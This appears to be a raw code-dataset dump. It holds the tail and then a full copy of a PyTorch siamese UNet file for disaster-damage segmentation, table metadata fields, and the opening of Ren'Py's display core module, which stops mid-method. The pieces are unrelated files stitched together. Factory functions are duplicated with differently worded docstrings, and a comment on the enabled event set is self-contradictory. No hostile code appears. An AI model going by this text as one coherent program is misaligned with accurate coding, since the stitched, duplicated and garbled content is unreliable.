        abn_block=partial(ABN, activation=ACT_RELU),
    )
def densenet121_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """UnetV2SegmentationModel over a DenseNet-121 encoder.

    NOTE(review): ``input_channels`` is accepted but never used.
    """
    encoder = E.DenseNet121Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
        damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
        unet_channels=[64, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def densenet169_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """UnetV2SegmentationModel over a DenseNet-169 encoder (wider first
    decoder stage than the 121 variant).

    NOTE(review): ``input_channels`` is accepted but never used.
    """
    encoder = E.DenseNet169Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
        damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
        unet_channels=[128, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def resnet18_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """UnetV2SegmentationModel over a ResNet-18 encoder.

    NOTE(review): ``input_channels`` is accepted but never used.
    """
    encoder = E.Resnet18Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
        damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
        unet_channels=[64, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def resnet34_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """UnetV2SegmentationModel over a ResNet-34 encoder.

    NOTE(review): ``input_channels`` is accepted but never used.
    """
    encoder = E.Resnet34Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
        damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
        unet_channels=[64, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def resnet50_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """UnetV2SegmentationModel over a ResNet-50 encoder.

    NOTE(review): ``input_channels`` is accepted but never used.
    """
    encoder = E.Resnet50Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
        damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
        unet_channels=[96, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def resnet101_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """UnetV2SegmentationModel over a ResNet-101 encoder.

    NOTE(review): ``input_channels`` is accepted but never used.
    """
    encoder = E.Resnet101Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
        damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
        unet_channels=[64, 128, 256, 384],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def seresnext50_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """UnetV2SegmentationModel over an SE-ResNeXt-50 encoder.

    NOTE(review): ``input_channels`` is accepted but never used.
    """
    encoder = E.SEResNeXt50Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
        damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
        unet_channels=[64, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def seresnext101_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """UnetV2SegmentationModel over an SE-ResNeXt-101 encoder.

    NOTE(review): ``input_channels`` is accepted but never used.
    """
    encoder = E.SEResNeXt101Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
        damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
        unet_channels=[128, 128, 256, 384],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
| 38.554386 | 117 | 0.650983 | from functools import partial
from typing import List, Union, Callable
import torch
from pytorch_toolbelt.modules import ABN, ACT_RELU, ACT_SWISH
from pytorch_toolbelt.modules import encoders as E
from pytorch_toolbelt.modules.decoders import DecoderModule
from pytorch_toolbelt.modules.encoders import EncoderModule
from torch import nn
from torch.nn import functional as F
from .common import disaster_type_classifier, damage_types_classifier
from ..dataset import OUTPUT_MASK_KEY, DISASTER_TYPE_KEY, DISASTER_TYPES, DAMAGE_TYPE_KEY, DAMAGE_TYPES
__all__ = ["UnetV2SegmentationModel"]
class ConvBottleneck(nn.Module):
    """Fuses a decoder output with an encoder skip connection by concatenating
    them along the channel axis and applying a 3x3 conv + ReLU."""

    def __init__(self, in_channels, out_channels):
        super().__init__()
        self.seq = nn.Sequential(
            nn.Conv2d(in_channels, out_channels, 3, padding=1),
            nn.ReLU(inplace=True),
        )

    def forward(self, dec, enc):
        fused = torch.cat([dec, enc], dim=1)
        return self.seq(fused)
class UnetDecoderBlock(nn.Module):
    """One decoder stage: 2x nearest upsample, then 3x3 conv + ReLU.

    `middle_channels` is accepted only for signature compatibility and is
    not used by this implementation.
    """

    def __init__(self, in_channels, middle_channels, out_channels):
        super().__init__()
        self.layer = nn.Sequential(
            nn.Upsample(scale_factor=2),
            nn.Conv2d(in_channels, out_channels, 3, padding=1),
            nn.ReLU(inplace=True),
        )

    def forward(self, x):
        out = self.layer(x)
        return out
class UNetDecoderV2(DecoderModule):
    """U-Net style decoder that fuses encoder skip connections via ConvBottleneck.

    NOTE(review): `dropout` and `abn_block` are accepted but never referenced in
    this body — presumably kept for signature compatibility; confirm before removing.
    """
    def __init__(
        self,
        feature_maps: List[int],
        decoder_features: List[int],
        mask_channels: int,
        last_upsample_filters=None,
        dropout=0.0,
        abn_block=ABN,
    ):
        super().__init__()
        # A scalar decoder_features is expanded to a doubling sequence, one
        # entry per encoder feature map.
        if not isinstance(decoder_features, list):
            decoder_features = [decoder_features * (2 ** i) for i in range(len(feature_maps))]
        if last_upsample_filters is None:
            last_upsample_filters = decoder_features[0]
        self.encoder_features = feature_maps
        self.decoder_features = decoder_features
        self.decoder_stages = nn.ModuleList([self.get_decoder(idx) for idx in range(0, len(self.decoder_features))])
        # Bottleneck i (deepest first) concatenates the matching skip connection
        # (encoder_features[-i-2] channels) with the upsampled decoder output
        # (f channels) and maps back to f channels.
        self.bottlenecks = nn.ModuleList(
            [
                ConvBottleneck(self.encoder_features[-i - 2] + f, f)
                for i, f in enumerate(reversed(self.decoder_features[:]))
            ]
        )
        self.output_filters = decoder_features
        self.last_upsample = UnetDecoderBlock(decoder_features[0], last_upsample_filters, last_upsample_filters)
        # 1x1 conv projecting to the requested number of mask channels.
        self.final = nn.Conv2d(last_upsample_filters, mask_channels, kernel_size=1)
    def get_decoder(self, layer):
        # The deepest stage consumes the encoder's last feature map; every
        # other stage consumes the output of the next-deeper decoder stage.
        in_channels = (
            self.encoder_features[layer + 1]
            if layer + 1 == len(self.decoder_features)
            else self.decoder_features[layer + 1]
        )
        return UnetDecoderBlock(in_channels, self.decoder_features[layer], self.decoder_features[max(layer, 0)])
    def forward(self, feature_maps):
        # Walk from the deepest feature map up, upsampling and fusing the
        # corresponding skip connection at each stage.
        last_dec_out = feature_maps[-1]
        x = last_dec_out
        for idx, bottleneck in enumerate(self.bottlenecks):
            rev_idx = -(idx + 1)
            decoder = self.decoder_stages[rev_idx]
            x = decoder(x)
            x = bottleneck(x, feature_maps[rev_idx - 1])
        x = self.last_upsample(x)
        f = self.final(x)
        return f
class UnetV2SegmentationModel(nn.Module):
    """Siamese pre/post-image segmentation model.

    The shared encoder is applied to both the pre and post images; the two
    feature pyramids are concatenated channel-wise and decoded into a mask.
    Optional disaster-type and damage-type classifier heads read the deepest
    fused feature map.
    """
    def __init__(
        self,
        encoder: EncoderModule,
        num_classes: int,
        disaster_type_classes: int,
        damage_type_classes: int,
        unet_channels: List[int],
        dropout=0.25,
        abn_block: Union[ABN, Callable[[int], nn.Module]] = ABN,
        full_size_mask=True,
    ):
        super().__init__()
        self.encoder = encoder
        # Pre/post features are concatenated, doubling every channel count.
        feature_maps = [2 * fm for fm in encoder.output_filters]
        self.decoder = UNetDecoderV2(
            feature_maps=feature_maps,
            decoder_features=unet_channels,
            mask_channels=num_classes,
            dropout=dropout,
            abn_block=abn_block,
        )
        self.full_size_mask = full_size_mask
        # Auxiliary heads; a None class count disables the head.
        if disaster_type_classes is not None:
            self.disaster_type_classifier = disaster_type_classifier(
                feature_maps[-1], disaster_type_classes, dropout=dropout
            )
        else:
            self.disaster_type_classifier = None
        if damage_type_classes is not None:
            self.damage_types_classifier = damage_types_classifier(
                feature_maps[-1], damage_type_classes, dropout=dropout
            )
        else:
            self.damage_types_classifier = None
    def forward(self, x):
        # x packs both images: channels 0-2 are the pre image, 3-5 the post image.
        batch_size = x.size(0)
        pre, post = x[:, 0:3, ...], x[:, 3:6, ...]
        if self.training:
            # Training: one encoder pass over the stacked batch (pre then post),
            # then re-pair the halves by channel concatenation.
            x = torch.cat([pre, post], dim=0)
            features = self.encoder(x)
            features = [torch.cat([f[0:batch_size], f[batch_size : batch_size * 2]], dim=1) for f in features]
        else:
            # Inference: two separate encoder passes.
            pre_features, post_features = self.encoder(pre), self.encoder(post)
            features = [torch.cat([pre, post], dim=1) for pre, post in zip(pre_features, post_features)]
        mask = self.decoder(features)
        if self.full_size_mask:
            mask = F.interpolate(mask, size=x.size()[2:], mode="bilinear", align_corners=False)
        output = {OUTPUT_MASK_KEY: mask}
        if self.disaster_type_classifier is not None:
            disaster_type = self.disaster_type_classifier(features[-1])
            output[DISASTER_TYPE_KEY] = disaster_type
        if self.damage_types_classifier is not None:
            damage_types = self.damage_types_classifier(features[-1])
            output[DAMAGE_TYPE_KEY] = damage_types
        return output
def efficientb3_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """EfficientNet-B3 encoder with a UNet-V2 decoder. `input_channels` is kept
    for signature compatibility but is not referenced here."""
    disaster_classes = len(DISASTER_TYPES) if classifiers else None
    damage_classes = len(DAMAGE_TYPES) if classifiers else None
    encoder = E.EfficientNetB3Encoder(
        pretrained=pretrained,
        layers=[0, 1, 2, 4, 6],
        abn_params={"activation": ACT_RELU},
    )
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=disaster_classes,
        damage_type_classes=damage_classes,
        unet_channels=[64, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def densenet121_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """DenseNet-121 encoder with a UNet-V2 decoder. `input_channels` is kept
    for signature compatibility but is not referenced here."""
    disaster_classes = len(DISASTER_TYPES) if classifiers else None
    damage_classes = len(DAMAGE_TYPES) if classifiers else None
    encoder = E.DenseNet121Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=disaster_classes,
        damage_type_classes=damage_classes,
        unet_channels=[64, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def densenet169_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """DenseNet-169 encoder with a UNet-V2 decoder. `input_channels` is kept
    for signature compatibility but is not referenced here."""
    disaster_classes = len(DISASTER_TYPES) if classifiers else None
    damage_classes = len(DAMAGE_TYPES) if classifiers else None
    encoder = E.DenseNet169Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=disaster_classes,
        damage_type_classes=damage_classes,
        unet_channels=[128, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def resnet18_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """ResNet-18 encoder with a UNet-V2 decoder. `input_channels` is kept for
    signature compatibility but is not referenced here."""
    disaster_classes = len(DISASTER_TYPES) if classifiers else None
    damage_classes = len(DAMAGE_TYPES) if classifiers else None
    encoder = E.Resnet18Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=disaster_classes,
        damage_type_classes=damage_classes,
        unet_channels=[64, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def resnet34_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """ResNet-34 encoder with a UNet-V2 decoder. `input_channels` is kept for
    signature compatibility but is not referenced here."""
    disaster_classes = len(DISASTER_TYPES) if classifiers else None
    damage_classes = len(DAMAGE_TYPES) if classifiers else None
    encoder = E.Resnet34Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=disaster_classes,
        damage_type_classes=damage_classes,
        unet_channels=[64, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def resnet50_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """ResNet-50 encoder with a UNet-V2 decoder. `input_channels` is kept for
    signature compatibility but is not referenced here."""
    disaster_classes = len(DISASTER_TYPES) if classifiers else None
    damage_classes = len(DAMAGE_TYPES) if classifiers else None
    encoder = E.Resnet50Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=disaster_classes,
        damage_type_classes=damage_classes,
        unet_channels=[96, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def resnet101_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """ResNet-101 encoder with a UNet-V2 decoder. `input_channels` is kept for
    signature compatibility but is not referenced here."""
    disaster_classes = len(DISASTER_TYPES) if classifiers else None
    damage_classes = len(DAMAGE_TYPES) if classifiers else None
    encoder = E.Resnet101Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=disaster_classes,
        damage_type_classes=damage_classes,
        unet_channels=[64, 128, 256, 384],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def seresnext50_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """SE-ResNeXt-50 encoder with a UNet-V2 decoder. `input_channels` is kept
    for signature compatibility but is not referenced here."""
    disaster_classes = len(DISASTER_TYPES) if classifiers else None
    damage_classes = len(DAMAGE_TYPES) if classifiers else None
    encoder = E.SEResNeXt50Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=disaster_classes,
        damage_type_classes=damage_classes,
        unet_channels=[64, 128, 256, 256],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
def seresnext101_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
    """SE-ResNeXt-101 encoder with a UNet-V2 decoder. `input_channels` is kept
    for signature compatibility but is not referenced here."""
    disaster_classes = len(DISASTER_TYPES) if classifiers else None
    damage_classes = len(DAMAGE_TYPES) if classifiers else None
    encoder = E.SEResNeXt101Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
    return UnetV2SegmentationModel(
        encoder,
        num_classes=num_classes,
        disaster_type_classes=disaster_classes,
        damage_type_classes=damage_classes,
        unet_channels=[128, 128, 256, 384],
        dropout=dropout,
        abn_block=partial(ABN, activation=ACT_RELU),
    )
| true | true |
f72ecbbcaf235e8b00e8f6b45bc705145e916d73 | 107,466 | py | Python | TEST_PROJET-1.0-pc/renpy/display/core.py | Dune0lyn/otome | e365b474e7df3f76ccc0853fd1665f6529a59304 | [
"CC0-1.0"
] | null | null | null | TEST_PROJET-1.0-pc/renpy/display/core.py | Dune0lyn/otome | e365b474e7df3f76ccc0853fd1665f6529a59304 | [
"CC0-1.0"
] | null | null | null | TEST_PROJET-1.0-pc/renpy/display/core.py | Dune0lyn/otome | e365b474e7df3f76ccc0853fd1665f6529a59304 | [
"CC0-1.0"
] | null | null | null | # Copyright 2004-2019 Tom Rothamel <pytom@bishoujo.us>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# This file contains code for initializing and managing the display
# window.
from __future__ import print_function
import renpy.display
import renpy.audio
import renpy.text
import renpy.test
import pygame_sdl2 as pygame
import sys
import os
import time
import cStringIO
import threading
import copy
import gc
import inspect
# Wall-clock time at which this module was imported.
import_time = time.time()
# The android module, when running under Android; None everywhere else.
try:
    import android # @UnresolvedImport
except:
    android = None
# Custom Ren'Py event types, registered with pygame_sdl2.
TIMEEVENT = pygame.event.register("TIMEEVENT")
PERIODIC = pygame.event.register("PERIODIC")
REDRAW = pygame.event.register("REDRAW")
EVENTNAME = pygame.event.register("EVENTNAME")
# All events except for TIMEEVENT and REDRAW
ALL_EVENTS = set(pygame.event.get_standard_events()) # @UndefinedVariable
ALL_EVENTS.add(PERIODIC)
ALL_EVENTS.add(EVENTNAME)
# The event types that are enabled; includes the custom events above
# (except for EVENTNAME being the only custom name absent from ALL_EVENTS'
# standard set — all four customs are listed here).
enabled_events = {
    pygame.QUIT,
    pygame.APP_TERMINATING,
    pygame.APP_LOWMEMORY,
    pygame.APP_WILLENTERBACKGROUND,
    pygame.APP_DIDENTERBACKGROUND,
    pygame.APP_WILLENTERFOREGROUND,
    pygame.APP_DIDENTERFOREGROUND,
    pygame.WINDOWEVENT,
    pygame.SYSWMEVENT,
    pygame.KEYDOWN,
    pygame.KEYUP,
    pygame.TEXTEDITING,
    pygame.TEXTINPUT,
    pygame.MOUSEMOTION,
    pygame.MOUSEBUTTONDOWN,
    pygame.MOUSEBUTTONUP,
    pygame.MOUSEWHEEL,
    pygame.JOYAXISMOTION,
    pygame.JOYHATMOTION,
    pygame.JOYBALLMOTION,
    pygame.JOYBUTTONDOWN,
    pygame.JOYBUTTONUP,
    pygame.JOYDEVICEADDED,
    pygame.JOYDEVICEREMOVED,
    pygame.CONTROLLERAXISMOTION,
    pygame.CONTROLLERBUTTONDOWN,
    pygame.CONTROLLERBUTTONUP,
    pygame.CONTROLLERDEVICEADDED,
    pygame.CONTROLLERDEVICEREMOVED,
    pygame.RENDER_TARGETS_RESET,
    TIMEEVENT,
    PERIODIC,
    REDRAW,
    EVENTNAME,
}
# The number of msec between periodic events.
PERIODIC_INTERVAL = 50
# Time management. get_time() warps wall-clock time around time_base by
# time_mult; init_time() sets both from the environment.
time_base = 0.0
time_mult = 1.0
def init_time():
    """
    Initializes the warped clock: records the current wall-clock time as
    the base, and reads the warp factor from the RENPY_TIMEWARP
    environment variable (defaulting to 1.0).
    """
    global time_base
    global time_mult
    warp_factor = os.environ.get("RENPY_TIMEWARP", "1.0")
    time_base = time.time()
    time_mult = float(warp_factor)
def get_time():
    """
    Returns the current time, with elapsed wall-clock time since time_base
    scaled by time_mult.
    """
    now = time.time()
    return time_base + time_mult * (now - time_base)
def displayable_by_tag(layer, tag):
    """
    Get the displayable on the given layer with the given tag.
    """
    scene_lists = renpy.game.context().scene_lists
    return scene_lists.get_displayable_by_tag(layer, tag)
class IgnoreEvent(Exception):
    """
    Raised when we want to ignore an event without returning anything
    from the interaction.
    """
class EndInteraction(Exception):
    """
    Raised (for example, inside a displayable's render method) to end the
    current interaction immediately, making it return `value`.
    """

    def __init__(self, value):
        # Stored rather than passed to Exception.__init__, matching how the
        # interaction code reads it back.
        self.value = value
class absolute(float):
    """
    A float subclass that marks a coordinate as absolute (in pixels),
    rather than a fraction of the containing area.
    """

    __slots__ = [ ]
def place(width, height, sw, sh, placement):
    """
    Performs the Ren'Py placement algorithm.

    `width`, `height`
        The width and height of the area the image will be placed in.

    `sw`, `sh`
        The size of the image to be placed.

    `placement`
        The tuple returned by Displayable.get_placement().

    Returns the (x, y) coordinate the image should be placed at.
    """

    xpos, ypos, xanchor, yanchor, xoffset, yoffset, _subpixel = placement

    def axis(pos, anchor, offset, area, size):
        # Missing components default to 0.
        if pos is None:
            pos = 0
        if anchor is None:
            anchor = 0
        if offset is None:
            offset = 0

        # A bare float is a fraction of the available space, while absolute
        # (a float subclass) and int are pixel counts - so the class check
        # must be exact, not isinstance().
        if pos.__class__ is float:
            pos *= area
        if anchor.__class__ is float:
            anchor *= size

        return pos + offset - anchor

    x = axis(xpos, xanchor, xoffset, width, sw)
    y = axis(ypos, yanchor, yoffset, height, sh)

    return x, y
class DisplayableArguments(renpy.object.Object):
    """
    Represents a set of arguments that can be passed to a duplicated
    displayable.
    """

    # The components of the image name, without any arguments.
    name = ()

    # The attribute arguments that were supplied.
    args = ()

    # The style prefix in play; DynamicImage uses this to decide which
    # prefix list to apply.
    prefix = None

    # True when invoked from lint.
    lint = False

    def copy(self, **kwargs):
        """
        Returns a copy of this object, with fields overridden by `kwargs`.
        """

        new = DisplayableArguments()
        new.__dict__.update(self.__dict__)
        new.__dict__.update(kwargs)

        return new

    def extraneous(self):
        # Report attributes the image did not consume, when the developer
        # has asked for that.
        if renpy.config.developer and renpy.config.report_extraneous_attributes:
            raise Exception("Image '{}' does not accept attributes '{}'.".format(
                " ".join(self.name),
                " ".join(self.args),
            ))
default_style = renpy.style.Style("default")
class Displayable(renpy.object.Object):
    """
    The base class for every object in Ren'Py that can be
    displayed to the screen.

    Drawables will be serialized to a savegame file. Therefore, they
    shouldn't store non-serializable things (like pygame surfaces) in
    their fields.
    """
    # Some invariants about method call order:
    #
    # per_interact is called before render.
    # render is called before event.
    #
    # get_placement can be called at any time, so can't
    # assume anything.
    # If True this displayable can accept focus.
    # If False, it can't, but it keeps its place in the focus order.
    # If None, it does not have a place in the focus order.
    focusable = None
    # This is the focus named assigned by the focus code.
    full_focus_name = None
    # A role ('selected_' or '' that prefixes the style).
    role = ''
    # The event we'll pass on to our parent transform.
    transform_event = None
    # Can we change our look in response to transform_events?
    transform_event_responder = False
    # The main displayable, if this displayable is the root of a composite
    # displayable. (This is used by SL to figure out where to add children
    # to.) If None, it is itself.
    _main = None
    # A list of the children that make up this composite displayable.
    _composite_parts = [ ]
    # The location the displayable was created at, if known.
    _location = None
    # Does this displayable use the scope?
    _uses_scope = False
    # Arguments supplied to this displayable.
    _args = DisplayableArguments()
    # Set to true of the displayable is duplicatable (has a non-trivial
    # duplicate method), or one of its children is.
    _duplicatable = False
    # Does this displayable require clipping?
    _clipping = False
    # Does this displayable have a tooltip?
    _tooltip = None
    def __ne__(self, o):
        # Defined in terms of __eq__ so subclasses only override equality.
        return not (self == o)
    def __init__(self, focus=None, default=False, style='default', _args=None, tooltip=None, default_focus=False, **properties):
        # The shared default style is reused when no extra properties are
        # given, avoiding a Style allocation per displayable.
        global default_style
        if (style == "default") and (not properties):
            self.style = default_style
        else:
            self.style = renpy.style.Style(style, properties) # @UndefinedVariable
        self.focus_name = focus
        self.default = default or default_focus
        self._tooltip = tooltip
        if _args is not None:
            self._args = _args
    def _copy(self, args=None):
        """
        Makes a shallow copy of the displayable. If `args` is provided,
        replaces the arguments with the stored copy.
        """
        rv = copy.copy(self)
        if args is not None:
            rv._args = args
        return rv
    def _duplicate(self, args):
        """
        Makes a duplicate copy of the following kids of displayables:

        * Displayables that can accept arguments.
        * Displayables that maintain state that should be reset before being
          shown to the user.
        * Containers that contain (including transitively) one of the other
          kinds of displayables.

        Displayables that contain state that can be manipulated by the user
        are never copied.

        This should call _unique on children that have been copied before
        setting its own _duplicatable flag.
        """
        if args and args.args:
            args.extraneous()
        return self
    def _get_tooltip(self):
        """
        Returns the tooltip of this displayable.
        """
        return self._tooltip
    def _in_current_store(self):
        """
        Returns a version of this displayable that will not change as it is
        rendered.
        """
        return self
    def _unique(self):
        """
        This is called when a displayable is "born" unique, which occurs
        when there is only a single reference to it. What it does is to
        manage the _duplicatable flag - setting it false unless one of
        the displayable's children happens to be duplicatable.
        """
        return
    def parameterize(self, name, parameters):
        """
        Obsolete alias for _duplicate.
        """
        a = self._args.copy(name=name, args=parameters)
        return self._duplicate(a)
    def _equals(self, o):
        """
        This is a utility method that can be called by a Displayable's
        __eq__ method, to compare displayables for type and displayable
        component equality.
        """
        if type(self) is not type(o):
            return False
        if self.focus_name != o.focus_name:
            return False
        if self.style != o.style:
            return False
        if self.default != o.default:
            return False
        return True
    def __unicode__(self):
        # Default display name; subclasses may override for debugging.
        return self.__class__.__name__
    def __repr__(self):
        return "<{} at {:x}>".format(unicode(self).encode("utf-8"), id(self))
    def find_focusable(self, callback, focus_name):
        # Reports this displayable (or a placeholder None, to preserve focus
        # ordering) and then recurses into the children.
        focus_name = self.focus_name or focus_name
        if self.focusable:
            callback(self, focus_name)
        elif self.focusable is not None:
            callback(None, focus_name)
        for i in self.visit():
            if i is None:
                continue
            i.find_focusable(callback, focus_name)
    def focus(self, default=False):
        """
        Called to indicate that this widget has the focus.
        """
        self.set_style_prefix(self.role + "hover_", True)
        if not default:
            renpy.exports.play(self.style.hover_sound)
    def unfocus(self, default=False):
        """
        Called to indicate that this widget has become unfocused.
        """
        self.set_style_prefix(self.role + "idle_", True)
    def is_focused(self):
        # While another displayable has grabbed the focus, nothing else is
        # considered focused.
        if renpy.display.focus.grab and renpy.display.focus.grab is not self:
            return
        return renpy.game.context().scene_lists.focused is self
    def set_style_prefix(self, prefix, root):
        """
        Called to set the style prefix of this widget and its child
        widgets, if any.

        `root` - True if this is the root of a style tree, False if this
        has been passed on to a child.
        """
        if prefix == self.style.prefix:
            return
        self.style.set_prefix(prefix)
        renpy.display.render.redraw(self, 0)
    def render(self, width, height, st, at):
        """
        Called to display this displayable. This is called with width
        and height parameters, which give the largest width and height
        that this drawable can be drawn to without overflowing some
        bounding box. It's also given two times. It returns a Surface
        that is the current image of this drawable.

        @param st: The time since this widget was first shown, in seconds.
        @param at: The time since a similarly named widget was first shown,
        in seconds.
        """
        raise Exception("Render not implemented.")
    def event(self, ev, x, y, st):
        """
        Called to report than an event has occured. Ev is the raw
        pygame event object representing that event. If the event
        involves the mouse, x and y are the translation of the event
        into the coordinates of this displayable. st is the time this
        widget has been shown for.

        @returns A value that should be returned from Interact, or None if
        no value is appropriate.
        """
        return None
    def get_placement(self):
        """
        Returns a style object containing placement information for
        this Displayable. Children are expected to overload this
        to return something more sensible.
        """
        return self.style.get_placement()
    def visit_all(self, callback, seen=None):
        """
        Calls the callback on this displayable, and then on all children
        of this displayable.
        """
        # `seen` holds ids of already-visited children, so shared subtrees
        # are only visited once.
        if seen is None:
            seen = set()
        for d in self.visit():
            if d is None:
                continue
            id_d = id(d)
            if id_d in seen:
                continue
            seen.add(id_d)
            d.visit_all(callback, seen)
        callback(self)
    def visit(self):
        """
        Called to ask the displayable to return a list of its children
        (including children taken from styles). For convenience, this
        list may also include None values.
        """
        return [ ]
    def per_interact(self):
        """
        Called once per widget per interaction.
        """
        return None
    def predict_one(self):
        """
        Called to ask this displayable to call the callback with all
        the images it may want to load.
        """
        return
    def predict_one_action(self):
        """
        Called to ask this displayable to cause image prediction
        to occur for images that may be loaded by its actions.
        """
        return
    def place(self, dest, x, y, width, height, surf, main=True):
        """
        This places a render (which must be of this displayable)
        within a bounding area. Returns an (x, y) tuple giving the location
        the displayable was placed at.

        `dest`
            If not None, the `surf` will be blitted to `dest` at the
            computed coordinates.

        `x`, `y`, `width`, `height`
            The bounding area.

        `surf`
            The render to place.

        `main`
            This is passed to Render.blit().
        """
        placement = self.get_placement()
        subpixel = placement[6]
